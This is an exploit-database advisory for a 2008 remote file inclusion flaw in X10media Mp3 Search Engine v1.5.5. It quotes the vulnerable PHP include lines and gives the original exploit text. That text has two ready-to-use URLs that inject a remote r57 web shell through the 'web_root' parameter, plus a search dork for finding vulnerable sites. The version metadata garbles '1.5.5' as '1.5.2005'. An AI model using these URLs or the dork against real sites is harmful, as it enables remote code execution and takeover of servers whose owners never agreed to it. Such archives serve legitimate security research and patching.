X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability

vendor:

Mp3 Search Engine

by:

THUNDER

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Mp3 Search Engine

Affected Version From: 1.5.2005

Affected Version To: 1.5.2005

Patch Exists: NO

Related CWE: N/A

CPE: a:x10media:mp3_search_engine:1.5.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability

X10media Mp3 Search Engine v1.5.5 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to the application not properly sanitizing user-supplied input in the 'web_root' parameter of the 'includes/function_core.php' and 'templates/layout_lyrics.php' scripts. An attacker can exploit this vulnerability by supplying a malicious URL in the 'web_root' parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

################## THUNDER #########################################################
#
#
#    X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
#
#    Founded by : THUNDER <t4h[at]hotmail.fr>
#    Dork: "This search engine is in no way intended for illegal downloads."
#
##### Vuln Code: ###################################################################
#
# file : /includes/function_core.php
#  -88.- include ($web_root."js/Mp3Player.php");
#
#-----------------------------------------------------------------
#
# file : /templates/layout_lyrics.php
#  .5.- include ($web_root."includes/function_list.php");
#
###### Exploit #####################################################################
#
#   http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
#
#   http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?           
#         
#
#
###### Greets #######################################################################
#
#   MoRoCcan InjEctor5 Te4m and All Hackers
#
####################################################################################

# milw0rm.com [2008-09-17]